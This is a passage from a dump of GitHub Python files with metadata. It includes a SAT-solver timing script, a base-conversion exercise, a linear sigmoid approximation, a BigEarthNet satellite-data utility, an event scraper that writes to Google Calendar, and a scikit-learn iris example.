in CNF.stavki])\n\tbefore1 = clock()\n\trez1 = dpll(kopija)\n\tafter1 = clock()\n\tprint(\"Dpll z večkratno čisto pojavitvijo potrebuje {0} sec.\".format(after1-before1))\n\nif D1==\"y\":\n\tkopija = Cnf([Stavek([i for i in s.literali]) for s in CNF.stavki])\n\tbefore2 = clock()\n\trez2 = dpll_brez_ciste(kopija)\n\tafter2 = clock()\n\tprint(\"Dpll z enkratno čisto pojavitvijo potrebuje {0} sec.\".format(after2-before2))\n\nif DB==\"y\":\n\tbefore3 = clock()\n\trez3 = dpll_osnoven(CNF)\n\tafter3 = clock()\n\tprint(\"Dpll brez vsakršne čiste pojavitve potrebuje {0} sec.\".format(after3-before3))\n\n\n\nfor i in range(L): #koliko primerov bomo naredili\n\tP = randint(1, 30) #koliko bo danih polj\n\tpolja = []\n\tp = 0\n\twhile p int:\n# \"\"\"Convert a decimal number to any base system\"\"\"\n# return 0 if num == 0 else convert_to_base(num // base, base) * DEC + num % base\n#\n#\n# print(f'convert num: {convert_to_base(20, 2)}, right res: {bin(11)}')\n# print(f'convert num: {convert_to_base(20, 8)}, right res: {oct(111)}')\n\nnum = 333333 # число, которое переводим\nbase = 8 # система исчисления\ntemp = ''\nres = ''\nwhile (num > 0):\n temp += str(num % base)\n num //= base\nres = temp[::-1]\nprint(res)\nprint(oct(333333))\n","repo_name":"IgorPont/Python_immersion","sub_path":"Seminar2/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70127205033","text":"import logging\nfrom sympy import interpolating_spline, symbols, exp\nimport torch\nfrom torch import nn\n\ndef sigmoid(x):\n x = 1 + exp(-x)\n return 1/x\n\ndef get_nodes(indexes=[-6, -5, -3, -2, -1, 0, 1, 2, 3, 5, 6],\n func=sigmoid):\n \"\"\"boundary 保证函数取得边界值\"\"\"\n x = symbols(\"x\")\n if 0.0 not in indexes:\n indexes.append(0.0)\n indexes.sort() # 排序\n boundary = max(abs(indexes[-1]), abs(indexes[0]))\n indexes[-1] = boundary\n indexes[0] = - boundary\n # simplify(sigmoid(1) + sigmoid(-1))\n logging.debug(f\"值的范围:\\n {indexes}\")\n sigmoid_sym = interpolating_spline(1,\n x,\n indexes,\n [float(func(n)) for n in indexes])\n nodes = {}\n for expr, set_pair in sigmoid_sym.as_expr_set_pairs():\n nodes[set_pair] = float(expr.diff()), float(expr.taylor_term(0, x))\n return nodes\n\ndef linear_sigmoid(x, nodes):\n y = torch.zeros_like(x)\n for set_pair, (scale, zero_point) in nodes.items():\n start, end = [torch.tensor(k, dtype=torch.float32) \n for k in set_pair.args[:2]]\n scale, zero_point = [torch.tensor(k, dtype=torch.float32) \n for k in [scale, zero_point]]\n cond = (x >= start) * (x < end)\n f = x * scale + zero_point\n y += f * cond\n y += torch.ones_like(x) * (x >= end)\n return y #* (y <=1) * (y >= 0)\n","repo_name":"xinetzone/torch-book","sub_path":"tests/quant/sigmoid-fx/fixed_sigmoid.py","file_name":"fixed_sigmoid.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"18569693298","text":"import requests\nimport datetime\nimport pytz\n\n\ndef load_attempts():\n page = 1\n while True:\n api_response = requests.get(\n 'https://devman.org/api/challenges/solution_attempts',\n params={'page': page}\n ).json()\n page += 1\n if page > api_response['number_of_pages']:\n break\n for record in api_response['records']:\n yield {\n 'username': record['username'],\n 'timestamp': record['timestamp'],\n 'timezone': record['timezone'],\n }\n\n\ndef get_midnighters(attempts):\n midnight = 0\n morning = 5\n midnighters = set()\n for attempt in attempts:\n hour_of_attempt = timestamp_to_hours(attempt['timestamp'], attempt['timezone'])\n if midnight <= hour_of_attempt <= morning:\n midnighters.add(attempt['username'])\n return midnighters\n\n\ndef timestamp_to_hours(timestamp, user_timezone):\n return datetime.datetime.fromtimestamp(\n timestamp,\n tz=pytz.timezone(user_timezone)\n ).hour\n\n\nif __name__ == '__main__':\n print('Midnighters:')\n for midnighter in get_midnighters(load_attempts()):\n print(midnighter)\n","repo_name":"Serg4356/15_midnighters","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"73904725033","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 12 12:12:19 2020\n\n@author: Eoin.Walsh\n\"\"\"\n\nimport os \nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport utm\nimport csv\n\n\"\"\"Script for dealing with the data provided by Big Earth Net\n\n Functions: \n \n 1. rgb_img() ---gathers the 3 colour bands for ther \n sentinel-2 data and creates a 3 channel array \n (rgb image when plotted)\n \n 2. near_infrared() ---gathers the near infrared band \n for the sentinel-2 data and creates\n a 1 channel array (grayscale image when plotted)\n \n 3. utm_to_latlon_upper() ---gathers the utm coordinate of \n the top left corner of a sentinel-2 segment\n from the metadata file and converts it to (lat,lon)\n \n 4. utm_to_latlon_lower() ---gathers the utm coordinate of \n the bottom right corner of a sentinel-2 segment\n from the metadata file and converts it to (lat,lon)\n \n 5. utm_coords() ---gathers the utm coordinates for the bottom right ant top left\n corners of the corresponding segments.\n \n 6. remove_noisy_images() ---removes the noisy images (images that contain cloud etc) \n from the bigearthnet sentinel-2 dataset\n \n 7. primary_cover_classes() ---primary land cover classes as defined by the \n corine dataset for european landcover types\n \n 8. label_primary() ---labels the bigearthnet data in terms of corine primary\n labels rather than the tertiary labels provided in the dataset\n \n 9. secondary_cover_classes() ---secondary land cover classes as defined by the \n corine dataset for european landcover types\n \n 10. label_secondary() ---labels the bigearthnet data in terms of corine secondary\n labels rather than the tertiary labels provided in the dataset\n \n\"\"\"\ndef rgb_img(path,plot=True,labels=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n plot = True - plots the rgb image for the segment\n plot = False - no plot just returns the corresponding array\n \n labels = True - Print corine labels for the segment \n labels = False - No print, just returns the labels as a list\n \n Returns: 3 channel numpy array for rgb image + corresponding corine labels\n \n \"\"\"\n \n images = sorted(os.listdir(path)) #list the data in the directory\n \n \n blue = os.path.join(path,images[1]) #blue sentinel-2 band path\n blue = np.array(cv2.imread(blue,cv2.IMREAD_GRAYSCALE)) #create blue band array\n \n green = os.path.join(path,images[2]) #green sentinel-2 band path\n green = np.array(cv2.imread(green,cv2.IMREAD_GRAYSCALE)) #create green band array\n \n red = os.path.join(path,images[3]) #red sentinel-2 band path \n red = np.array(cv2.imread(red,cv2.IMREAD_GRAYSCALE)) #create red band array\n \n image = np.dstack((red,green,blue)) # stack the 3 bands to create rgb array\n \n #plot the rgb image\n if plot==True:\n \n image = (image/np.max(image)).astype('float32')\n \n fig, axes = plt.subplots()\n fig.set_size_inches(5, 5, forward=True)\n fig.set_dpi(500)\n plt.imshow(image)\n plt.axis('off')\n plt.show()\n \n metadata = os.path.join(path,images[12]) #metadata for the segment path\n file = open(metadata,) #open the metadata file\n data = json.load(file) #load the json metaadata file\n label = data['labels'] #parse labels data from metadata json file\n \n #print the labels\n if labels==True:\n \n print(\"\\nLabels: \",data['labels'])\n \n return image,label #return 3 channel image array and corresponding corine labels\n\ndef near_infrared(path,plot=True,labels=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n plot = True - plots the rgb image for the segment\n plot = False - no plot just returns the corresponding array\n \n labels = True - Print corine labels for the segment \n labels = False - No print, just returns the labels as a list\n \n Returns: 1 channel numpy array + corresponding corine labels\n \n \"\"\"\n \n images = sorted(os.listdir(path)) #list the data in the directory\n \n near_infrared = os.path.join(path,images[7]) #near infrared band path\n near_infrared = np.array(cv2.imread(near_infrared,cv2.IMREAD_GRAYSCALE)) #near infrared band as array\n \n #plot the near-infrared image\n if plot==True:\n \n fig, axes = plt.subplots()\n fig.set_size_inches(5, 5, forward=True)\n fig.set_dpi(500)\n plt.imshow(np.squeeze(near_infrared),cmap = 'Greys_r', vmax = np.max(near_infrared), vmin = np.min(near_infrared))\n plt.axis('off')\n plt.show()\n \n metadata = os.path.join(path,images[12]) #metadata path\n file = open(metadata,) #open metadata file\n data = json.load(file) #load metadata json file\n labels = data['labels'] #parse labels data from the json file\n \n #print the labels\n if labels==True:\n \n print(\"Labels: \",data['labels'])\n \n return near_infrared,labels #return 1 channel graysacale image array and corresponding corine labels\n\ndef utm_to_latlon_upper(path, prints=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n prints = True - print (lat,lon) coordinates\n prints = False - dont print, just return the values\n \n Returns: upper left corner (lat,lon) coordinate of sentinel-2 segment\n \n \"\"\"\n \n files = os.listdir(path) #list the data in the directory\n \n metadata_dir = os.path.join(path,files[12]) #metadata path\n \n json_file = open(metadata_dir) #open the metadata file\n \n metadata = json.load(json_file) #load the metadaat json file\n \n utm_x = metadata['coordinates']['ulx'] #parse metadata to obtain upper left corner x-coordinate of segment\n \n utm_y = metadata['coordinates']['uly'] #parse metadata to obtain upper left corner y-coordinate of segment\n \n tile_letter = metadata['tile_source'][41:42] #parse utm tile letter from metadata\n \n tile_number = int(metadata['tile_source'][39:41]) #parse utm tile number from metadata\n \n latitude, longitude = utm.to_latlon(utm_x, utm_y, tile_number, tile_letter) #convert the coordinate to (lat,lon)\n \n latitude,longitude = np.round(latitude,6).astype('float32'),np.round(longitude,6).astype('float32') #round the data to 6 decimals\n \n #print the (lat,lon) coordinates\n if prints==True:\n \n print('coordinates:',latitude,',',longitude)\n \n return latitude,longitude\n\ndef utm_to_latlon_lower(path, prints=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n prints = True - print (lat,lon) coordinates\n prints = False - dont print, just return the values\n \n Returns: lower right corner (lat,lon) coordinate of sentinel-2 segment\n \n \"\"\"\n \n files = sorted(os.listdir(path)) #list the data in the directory\n \n metadata_dir = os.path.join(path,files[12]) #metadata path\n \n json_file = open(metadata_dir) #open the metadata \n \n metadata = json.load(json_file) #load the metadata json file\n \n utm_x = metadata['coordinates']['lrx'] #parse metadata to obtain lower right corner x-coordinate of segment\n \n utm_y = metadata['coordinates']['lry'] #parse metadata to obtain lower right corner y-coordinate of segment\n \n tile_letter = metadata['tile_source'][41:42] #parse utm tile letter from metadata\n \n tile_number = int(metadata['tile_source'][39:41]) #parse utm tile number from metadata\n \n latitude, longitude = utm.to_latlon(utm_x, utm_y, tile_number, tile_letter) #convert the coordinate to (lat,lon)\n \n latitude,longitude = np.round(latitude,6).astype('float32'),np.round(longitude,6).astype('float32') #round the data to 6 decimals\n \n #print the (lat,lon) coordinates\n if prints==True:\n \n print('coordinates:',latitude,',',longitude)\n \n return latitude,longitude\n\ndef utm_coords(path, prints=True):\n \n \"\"\"path = directory containing tif band data and metadata\n for a sentinel-2 segment\n \n prints = True - print utm coordinates\n prints = False - dont print, just return the values\n \n Returns: lower right corner utm coordinate of sentinel-2 segment\n \n \"\"\"\n \n files = sorted(os.listdir(path)) #list the data in the directory\n \n metadata_dir = os.path.join(path,files[12]) #metadata path\n \n json_file = open(metadata_dir) #open the metadata file\n \n metadata = json.load(json_file) #load the json file\n \n utm_x_upper = metadata['coordinates']['ulx'] #parse the upper left x-coordinate\n \n utm_y_upper = metadata['coordinates']['uly'] #parse the upper left y-coordinate\n \n utm_x_lower = metadata['coordinates']['lrx'] #parse the lower right x-coordinate\n \n utm_y_lower = metadata['coordinates']['lry'] #parse the lower right y-coordinate\n \n utm_upper = utm_x_upper,utm_y_upper #define the upper coordinate\n \n utm_lower = utm_x_lower,utm_y_lower #define the lower coordinate\n \n #print the coordinates\n if prints==True:\n \n print('Upper Coordinates:',utm_upper)\n \n print('\\n\\nLower Coordinates:',utm_lower)\n \n \n return utm_upper,utm_lower\n\ndef remove_noisy_images(images):\n \n \"\"\"images = list of the directories containing sentinel-2 band data\n \n Returns: Sentinel-2 data with snow and cloud cover removed\n \n \"\"\"\n \n snow_data = [] #initiate list\n \n cloud_data = [] #initiate list\n \n #directory containing csv files with names of segment files that have cloud and snow present\n current_path = os.getcwd()\n noisy_data_dir = current_path+'/Big_Earth_Net_noisy_data'\n \n files = sorted(os.listdir(noisy_data_dir)) #list the csv files\n \n snow_dir = os.path.join(noisy_data_dir,files[1]) #csv file containing info on snow covered segments path\n\n #read the snow csv file and append rows to the initiated list\n with open(snow_dir) as csvfile:\n \n readCSV = csv.reader(csvfile, delimiter=',')\n \n for row in readCSV:\n \n snow_data.append(row)\n \n snow_data = np.hstack(snow_data) #convert list to nmupy array\n \n cloud_dir = os.path.join(noisy_data_dir,files[0]) #csv file containing info on cloud covered segments path\n \n #read the cloud csv file and append rows to the initiated list\n with open(cloud_dir) as csvfile:\n \n readCSV = csv.reader(csvfile, delimiter=',')\n \n for row in readCSV:\n \n cloud_data.append(row)\n \n cloud_data = np.hstack(cloud_data) #convert list to numpy array\n \n #compare the overall list with the snow list and create a list with the common strings removed\n cleaned_data = np.setdiff1d(images,snow_data) \n \n #compare the new overall list with the cloud list and create a list with the common strings removed\n cleaned_data1 = np.setdiff1d(cleaned_data,cloud_data) \n \n return cleaned_data1\n \ndef primary_cover_classes(path):\n \n \"\"\"path = directory containing the text files which contain info on which\n tertiary corine labels belong to which primary classes\n \n Returns: dictionary with 5 lists defining which tertiary corine labels belong \n to which primary classes\n \n \"\"\"\n \n txt_files = sorted(os.listdir(path)) #directory containing primary class info .txt files\n \n urban_path = os.path.join(path,txt_files[3]) #urban class text file\n \n agri_path = os.path.join(path,txt_files[0]) #agri-rural class text file\n \n non_agri_path = os.path.join(path,txt_files[2]) #non-agri rural text file\n \n nodata_path = os.path.join(path,txt_files[1]) #no data text file\n \n water_path = os.path.join(path,txt_files[4]) #water text file\n \n wetlands_path = os.path.join(path,txt_files[5]) #wetlands text file\n \n #read the text file for urban and create a list from the lines\n with open(urban_path,'r') as txtfile:\n \n urban = txtfile.readlines()\n \n for i in range(len(urban)):\n \n urban[i] = urban[i].replace('\\n','')\n \n #read the text file for agri rural and create a list from the lines\n with open(agri_path,'r') as txtfile:\n \n agri = txtfile.readlines()\n \n for i in range(len(agri)):\n \n agri[i] = agri[i].replace('\\n','')\n \n #read the text file for non-agri rural and create a list from the lines\n with open(non_agri_path,'r') as txtfile:\n \n non_agri = txtfile.readlines()\n \n for i in range(len(non_agri)):\n \n non_agri[i] = non_agri[i].replace('\\n','') \n \n #read the text file for no data and create a list from the lines\n with open(nodata_path,'r') as txtfile:\n \n nodata = txtfile.readlines()\n \n for i in range(len(nodata)):\n \n nodata[i] = nodata[i].replace('\\n','')\n \n #read the text file for water and create a list from the lines\n with open(water_path,'r') as txtfile:\n \n water = txtfile.readlines()\n \n for i in range(len(water)):\n \n water[i] = water[i].replace('\\n','')\n \n #read the text file for wetlands and create a list from the lines\n with open(wetlands_path,'r') as txtfile:\n \n wetlands = txtfile.readlines()\n \n for i in range(len(wetlands)):\n \n wetlands[i] = wetlands[i].replace('\\n','')\n \n #create a dictionary containing the lists\n primary_covers_dict = { \"urban\" : urban,\n \"agri-rural\" : agri,\n \"non-agri-rural\" : non_agri,\n \"wetlands\" : wetlands,\n \"water\" : water,\n \"No Data\" : nodata\n }\n\n return primary_covers_dict\n \ndef label_primary(labelss,dictionary):\n \n \"\"\"labells = tertiary labels for a particular sentinel-2 segment from bigearthnet \n \n dictionary = dictionary containing info about which tertiary labels bleong to which \n primary class, obtained using primary_cover_classes() function above\n \n Returns: dictionary with 5 lists defining which tertiary corine labels belong \n to which primary classes\n \n \"\"\"\n \n urban = dictionary['urban'] #urban labels list\n\n agri_rural = dictionary['agri-rural'] #agri-rural labels lists\n \n nonagri_rural = dictionary['non-agri-rural'] #non-agri rural labels list\n \n wetlands = dictionary['wetlands'] #wetlands labels list\n \n water = dictionary['water'] #water labels list\n \n nodata = dictionary['No Data'] #nodata labels list\n \n #check which class the tertiary labels for the segment belongs to and then \n #change the label name to that class\n for i in range(len(labelss)):\n \n if labelss[i] in urban:\n \n labelss[i] = 'urban'\n \n if labelss[i] in agri_rural:\n \n labelss[i] = 'agri-rural'\n \n if labelss[i] in nonagri_rural:\n \n labelss[i] = 'non-agri-rural'\n \n if labelss[i] in wetlands:\n \n labelss[i] = 'wetlands'\n \n if labelss[i] in water:\n \n labelss[i] = 'water'\n \n if labelss[i] in nodata:\n \n labelss[i] = 'no data'\n \n return labelss\n \ndef secondary_cover_classes(path):\n \n \n \"\"\"path = directory containing the text files which contain info on which\n tertiary corine labels belong to which secondary classes\n \n Returns: dictionary with 15 lists defining which tertiary corine labels belong \n to which secondary classes\n \n \"\"\"\n \n txt_files = sorted(os.listdir(path)) #list of text files\n \n #paths to all of the text files for each landcover type\n arable_land_path = os.path.join(path,txt_files[0])\n \n coastal_water_path = os.path.join(path,txt_files[1])\n \n coastal_wetlands_path = os.path.join(path,txt_files[2])\n \n construction_sites_path = os.path.join(path,txt_files[3])\n \n forests_path = os.path.join(path,txt_files[4])\n \n fruit_plantations_path = os.path.join(path,txt_files[5])\n \n industry_path = os.path.join(path,txt_files[6])\n \n inland_water_path = os.path.join(path,txt_files[7])\n \n nodata_path = os.path.join(path,txt_files[8])\n \n pastures_path = os.path.join(path,txt_files[9])\n \n peatlands_path = os.path.join(path,txt_files[10])\n \n sparse_areas_path = os.path.join(path,txt_files[11])\n \n urban_green_path = os.path.join(path,txt_files[12])\n \n urban_fabric_path = os.path.join(path,txt_files[13])\n \n vegetation_path = os.path.join(path,txt_files[14])\n \n wild_grassland_path = os.path.join(path,txt_files[15])\n \n #creating lists from text files\n with open(arable_land_path,'r') as txtfile:\n \n arable_land = txtfile.readlines()\n \n for i in range(len(arable_land)):\n \n arable_land[i] = arable_land[i].replace('\\n','')\n \n with open(coastal_water_path,'r') as txtfile:\n \n coastal_water = txtfile.readlines()\n \n for i in range(len(coastal_water)):\n \n coastal_water[i] = coastal_water[i].replace('\\n','')\n \n with open(coastal_wetlands_path,'r') as txtfile:\n \n coastal_wetlands = txtfile.readlines()\n \n for i in range(len(coastal_wetlands)):\n \n coastal_wetlands[i] = coastal_wetlands[i].replace('\\n','') \n \n with open(construction_sites_path,'r') as txtfile:\n \n construction_sites = txtfile.readlines()\n \n for i in range(len(construction_sites)):\n \n construction_sites[i] = construction_sites[i].replace('\\n','')\n \n with open(forests_path,'r') as txtfile:\n \n forests = txtfile.readlines()\n \n for i in range(len(forests)):\n \n forests[i] = forests[i].replace('\\n','')\n \n with open(fruit_plantations_path,'r') as txtfile:\n \n fruit_plantations = txtfile.readlines()\n \n for i in range(len(fruit_plantations)):\n \n fruit_plantations[i] = fruit_plantations[i].replace('\\n','')\n \n with open(industry_path,'r') as txtfile:\n \n industry = txtfile.readlines()\n \n for i in range(len(industry)):\n \n industry[i] = industry[i].replace('\\n','')\n\n with open(inland_water_path,'r') as txtfile:\n \n inland_water = txtfile.readlines()\n \n for i in range(len(inland_water)):\n \n inland_water[i] = inland_water[i].replace('\\n','')\n \n with open(nodata_path,'r') as txtfile:\n \n nodata = txtfile.readlines()\n \n for i in range(len(nodata)):\n \n nodata[i] = nodata[i].replace('\\n','')\n \n with open(pastures_path,'r') as txtfile:\n \n pastures = txtfile.readlines()\n \n for i in range(len(pastures)):\n \n pastures[i] = pastures[i].replace('\\n','')\n \n with open(peatlands_path,'r') as txtfile:\n \n peatlands = txtfile.readlines()\n \n for i in range(len(peatlands)):\n \n peatlands[i] = peatlands[i].replace('\\n','')\n \n with open(sparse_areas_path,'r') as txtfile:\n \n sparse_areas = txtfile.readlines()\n \n for i in range(len(sparse_areas)):\n \n sparse_areas[i] = sparse_areas[i].replace('\\n','')\n \n with open(urban_green_path,'r') as txtfile:\n \n urban_green = txtfile.readlines()\n \n for i in range(len(urban_green)):\n \n urban_green[i] = urban_green[i].replace('\\n','')\n \n with open(urban_fabric_path,'r') as txtfile:\n \n urban_fabric = txtfile.readlines()\n \n for i in range(len(urban_fabric)):\n \n urban_fabric[i] = urban_fabric[i].replace('\\n','')\n \n with open(vegetation_path,'r') as txtfile:\n \n vegetation = txtfile.readlines()\n \n for i in range(len(vegetation)):\n \n vegetation[i] = vegetation[i].replace('\\n','')\n \n with open(wild_grassland_path,'r') as txtfile:\n \n wild_grassland = txtfile.readlines()\n \n for i in range(len(wild_grassland)):\n \n wild_grassland[i] = wild_grassland[i].replace('\\n','')\n \n #dictionary with lists assigning tertiary labels to secondary classes\n secondary_covers_dict = { \"urban fabric\" : urban_fabric,\n \"arable land\" : arable_land,\n \"coastal water\" : coastal_water,\n \"coastal wetlands\" : coastal_wetlands,\n \"construction sites\" : construction_sites,\n \"forests\" : forests,\n \"fruit plantations\" : fruit_plantations,\n \"industry\" : industry,\n \"inland water\" : inland_water,\n \"no data\" : nodata,\n \"pastures\" : pastures,\n \"peatlands\" : peatlands,\n \"sparse areas\" : sparse_areas,\n \"urban green\" : urban_green,\n \"vegetation\" : vegetation,\n \"wild grassland\" : wild_grassland\n }\n\n return secondary_covers_dict \n\ndef label_secondary(labelss,dictionary):\n \n \"\"\"labelss = tertiary labels for a particular sentinel-2 segment from bigearthnet \n \n dictionary = dictionary containing info about which tertiary labels bleong to which \n secondary class, obtained using secondary_cover_classes() function above\n \n Returns: dictionary with 15 lists defining which tertiary corine labels belong \n to which secondary classes\n \n \"\"\"\n \n urban_fabric = dictionary['urban fabric']\n\n arable_land = dictionary['arable land']\n \n coastal_water = dictionary['coastal water']\n \n coastal_wetlands = dictionary['coastal wetlands']\n \n construction_sites = dictionary['construction sites']\n \n forests = dictionary['forests']\n \n fruit_plantations = dictionary['fruit plantations']\n \n industry = dictionary['industry']\n \n inland_water = dictionary['inland water']\n \n no_data = dictionary['no data']\n \n pastures = dictionary['pastures']\n \n peatlands = dictionary['peatlands']\n \n sparse_areas = dictionary['sparse areas']\n \n urban_green = dictionary['urban green']\n \n vegetation = dictionary['vegetation']\n \n wild_grassland = dictionary['wild grassland']\n \n #find out which secondary class the labels in question belong to and then rename\n #the label the class in question\n for i in range(len(labelss)):\n \n if labelss[i] in urban_fabric:\n \n labelss[i] = 'urban fabric'\n \n if labelss[i] in arable_land:\n \n labelss[i] = 'arable land'\n \n if labelss[i] in coastal_water:\n \n labelss[i] = 'coastal water'\n \n if labelss[i] in coastal_wetlands:\n \n labelss[i] = 'coastal wetlands'\n \n if labelss[i] in construction_sites:\n \n labelss[i] = 'construction sites'\n \n if labelss[i] in forests:\n \n labelss[i] = 'forests'\n\n if labelss[i] in fruit_plantations:\n \n labelss[i] = 'fruit plantations'\n\n if labelss[i] in industry:\n \n labelss[i] = 'industry'\n \n if labelss[i] in inland_water:\n \n labelss[i] = 'inland water'\n \n if labelss[i] in no_data:\n \n labelss[i] = 'no data'\n \n if labelss[i] in pastures:\n \n labelss[i] = 'pastures'\n \n if labelss[i] in peatlands:\n \n labelss[i] = 'peatlands'\n \n if labelss[i] in sparse_areas:\n \n labelss[i] = 'sparse areas'\n \n if labelss[i] in urban_green:\n \n labelss[i] = 'urban green'\n \n if labelss[i] in vegetation:\n \n labelss[i] = 'vegetation'\n \n if labelss[i] in wild_grassland:\n \n labelss[i] = 'wild grassland'\n \n return labelss\n\n\n\n \n \n","repo_name":"gbessardon/EoinWalshphysiographyAI","sub_path":"BigEarthnet_extraction/bigearthnet.py","file_name":"bigearthnet.py","file_ext":"py","file_size_in_byte":26682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10367915669","text":"#!/usr/bin/python\n# coding: UTF-8\n# This is created 2022/01/05 by Y. Shinohara\nimport sys\nfrom modules.constants import *\nfrom modules.parameters import ElkFiles, ElkData\n\nED = ElkData()\nEFs = ElkFiles()\n#\nargv = sys.argv\nargc = len(argv)\n#First standard input is the directory path we want\nif (argc == 1 or argc ==2 or argc ==3):\n print('# Error: No direcotry path.')\n sys.exit()\nelif (argc == 4):\n dir_path = argv[1]\n print('# The direcotry path is \"'+dir_path+'\".')\n elk_ver = int(argv[2])\n print('# Elk version is \"'+str(elk_ver)+'\".')\n Fortlib_option = argv[3]\n print('# Fortlib_option is \"'+str(Fortlib_option)+'\".')\n\nED.get_eigval_pmat(EFs, dir_path, elk_ver)\n\nfrom modules.generate_sigma_epsilon import GenerateSigmaEpsilon\nomega, sigma, epsilon, epsilon_inv = GenerateSigmaEpsilon.generate(ED, Fortlib_option, ewidth = 0.002)\nsum_epsilon, sum_epsilon_inv, omega_plasma = GenerateSigmaEpsilon.check_sum(ED)\n\n","repo_name":"Yasushi-Shinohara/Scripts4Elk","sub_path":"src/Get_linear_response.py","file_name":"Get_linear_response.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31060450145","text":"from __future__ import print_function\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import *\nimport base64\n\nimport os.path\nimport config\n\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\n# If modifying these scopes, delete the file token.json.\nSCOPES = ['https://www.googleapis.com/auth/calendar']\n\n# Convert time from 12 hrs to RFC3339 standard\ndef time_convert(t):\n try:\n t = datetime.strptime(t, '%I:%M%p')\n return(t.time())\n except ValueError:\n # If only single time is mentioned then default to 00:00:00 for start time\n print(\"start_date missing\") \n return(\"00:00:00\") \n\n# To insert the events to Calendar via API v3\ndef inserter(dict,creds):\n try:\n service = build('calendar', 'v3', credentials=creds)\n\n # Template to Insert an event\n\n # Added base32hexencode as id to avoid creating duplicate events. Hopefully it works\n event = {\n 'id':base64.b32hexencode(dict.get('event_title').encode(\"UTF-8\")).decode(\"UTF-8\").lower()[:-6],\n 'summary': 'CS Dept Event - '+ dict.get('event_date'),\n 'description': dict.get('event_title') + ',' + dict.get('event_link'),\n 'start': {\n 'dateTime': dict.get('event_date')+'T'+dict.get('start_time')+'-04:00',\n 'timeZone': 'Canada/Eastern',\n },\n 'end': {\n 'dateTime': dict.get('event_date')+'T'+dict.get('end_time')+'-04:00',\n 'timeZone': 'Canada/Eastern',\n },\n 'reminders': {\n 'useDefault': True,\n },\n }\n\n # Call the Calendar Insert API\n\n event = service.events().insert(calendarId=config.Cal_ID, body=event).execute()\n print('Event created: %s' % (event.get('htmlLink')))\n\n except HttpError as error:\n print('An error occurred: %s' % error)\n\n\n# To scrape the website and get the events\ndef scraper(creds):\n URL = \"https://www.uwindsor.ca/science/computerscience/event-calendar/month\"\n page = requests.get(URL)\n\n # print(page.text)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n # To add past events change class_=\"single-day past\"\n cal3 = soup.find_all(class_=\"single-day future\")\n\n dict = {\n 'event_title':'',\n 'event_date':'',\n 'event_link':'',\n 'event_time':'',\n 'start_time':'',\n 'end_time':''\n }\n\n for i in range (len(cal3)):\n event_title = cal3[i].find_all(class_=\"event-title\")\n event_link = cal3[i].find_all('a', href=True)\n event_time = cal3[i].find_all(class_=\"event-date\")\n for k in range(len(event_time)):\n event_time[k] = event_time[k].text.strip()\n\n for j in range(len(event_title)):\n dict.update({'event_title': event_title[j].text.strip()})\n dict.update({'event_date': cal3[i][\"data-date\"]})\n dict.update({'event_link':\"www.uwindsor.ca\"+ event_link[j]['href']})\n dict.update({'event_time': event_time[j]})\n\n start_time = event_time[j][:event_time[j].find(' ')]\n end_time = event_time[j][event_time[j].rfind(' ')+1:]\n\n dict.update({'start_time': str(time_convert(start_time))})\n dict.update({'end_time': str(time_convert(end_time))})\n \n inserter(dict,creds)\n\n\ndef main():\n creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.json'):\n creds = Credentials.from_authorized_user_file('token.json', SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.json', 'w') as token:\n token.write(creds.to_json())\n\n try:\n page_token = None\n # service = build('calendar', 'v3', credentials=creds)\n # calendar_list = service.calendarList().list(pageToken=page_token).execute()\n # for calendar_list_entry in calendar_list['items']:\n # print(calendar_list_entry['summary'])\n scraper(creds)\n\n\n except HttpError as error:\n print('An error occurred: %s' % error)\n\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"rajdedhia10/UWinCalScraper","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"20841508492","text":"# モデルclfを使って訓練データで学習する\nfrom sklearn import datasets\nfrom sklearn import svm\n\n\niris = datasets.load_iris() # アヤメのデータセットを読み込む\nX = iris.data # データ\nY = iris.target # ターゲット\nn_train = len(X) // 2 # データの半分の個数\nX_train, X_test = X[:n_train], X[n_train:] # 訓練データ\n\"\"\"\n正答率の低い原因は\nn_train = len(X) // 2 と\nX_train, X_test = X[:n_train], X[n_train:] の訓練データにある\n3種類のアヤメのデータを2つに分けて前半のデータを訓練用に後半のデータをテスト用にしたので\n訓練データにはvirginicaのデータは1個もない為\n\"\"\"\nY_train, Y_test = Y[:n_train], Y[n_train:] # 訓練データ\nclf = svm.SVC() # モデルを作る\nclf.fit(X_train, Y_train) # 学習する\nprint(clf.score(X_test, Y_test))\n","repo_name":"natume5/rensyuuyou","sub_path":"python3 Guide note 